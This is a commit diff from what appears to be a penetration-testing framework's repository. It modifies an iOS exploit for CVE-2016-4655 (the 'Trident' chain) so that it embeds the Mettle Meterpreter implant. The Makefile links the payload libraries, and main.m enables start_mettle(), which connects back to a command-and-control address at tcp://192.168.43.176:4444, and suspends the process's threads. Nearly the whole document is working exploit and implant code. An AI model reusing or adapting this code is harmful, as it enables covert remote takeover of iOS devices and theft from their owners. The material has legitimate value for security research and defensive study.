don't merge, embed mettle within trident exploit

timwr · Apr 3, 2018 · 1a9bc74 · 1a9bc74
1 parent 9f174e7
commit 1a9bc74
Show file tree

Hide file tree

Showing 2 changed files with 27 additions and 25 deletions.
diff --git a/external/source/exploits/CVE-2016-4655/Makefile b/external/source/exploits/CVE-2016-4655/Makefile
@@ -5,7 +5,13 @@ GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
 GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS)
 GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
 SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
-GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) -Iheaders -framework CoreFoundation -framework Foundation -framework IOKit
+GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \
+		-Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \
+		-I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \
+		-I/Users/User/rsync/mettle/mettle/src \
+		-L/Users/User/rsync/mettle/build/aarch64-iphone-darwin/lib \
+		-lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \
+		-framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit
 
 all: clean main_ios
 

diff --git a/external/source/exploits/CVE-2016-4655/main.m b/external/source/exploits/CVE-2016-4655/main.m
@@ -23,9 +23,7 @@
 #include "nvpatch.h"
 #include "set.h"
 
-//#include <mettle.h>
-
-/*
+#include <mettle.h>
 
 void suspend_all_threads() {
     thread_act_t other_thread, current_thread;
@@ -50,8 +48,6 @@ void suspend_all_threads() {
         }
     }
 }
-*/
-
 
 /*
 extern char* const* environ;
@@ -89,34 +85,34 @@ int easyPosixSpawn(NSURL *launchPath,NSArray *arguments){
 }
 */
 
-//void start_mettle()
-//{
-  //NSLog(@"start_mettle");
-	//struct mettle *m = mettle();
-	//if (m == NULL) {
-		//return;
-	//}
+void start_mettle()
+{
+  NSLog(@"start_mettle");
+  struct mettle *m = mettle();
+  if (m == NULL) {
+    return;
+  }
 
-  //c2_add_transport_uri(mettle_get_c2(m), "tcp://192.168.43.176:4444");
+  c2_add_transport_uri(mettle_get_c2(m), "tcp://192.168.43.176:4444");
 
-  //NSLog(@"mettle_start");
-  //mettle_start(m);
+  NSLog(@"mettle_start");
+  mettle_start(m);
 
-  //mettle_free(m);
-  //NSLog(@"mettle_done");
-//}
+  mettle_free(m);
+  NSLog(@"mettle_done");
+}
 
 int main(int argc, char * argv[]) {
   NSLog(@"hello from exploit");
-  //suspend_all_threads();
-  //NSLog(@"threads suspended");
+  suspend_all_threads();
+  NSLog(@"threads suspended");
 
-  vm_address_t kbase = 0;
-  task_t kernel_task = get_kernel_task(&kbase);
-  LOG("kernel_task: 0x%x", kernel_task);
+  //vm_address_t kbase = 0;
+  //task_t kernel_task = get_kernel_task(&kbase);
+  //LOG("kernel_task: 0x%x", kernel_task);
 
 	NSLog(@"hello from uid %d", getuid());
-  //start_mettle();
+  start_mettle();
 
   return 0;
 }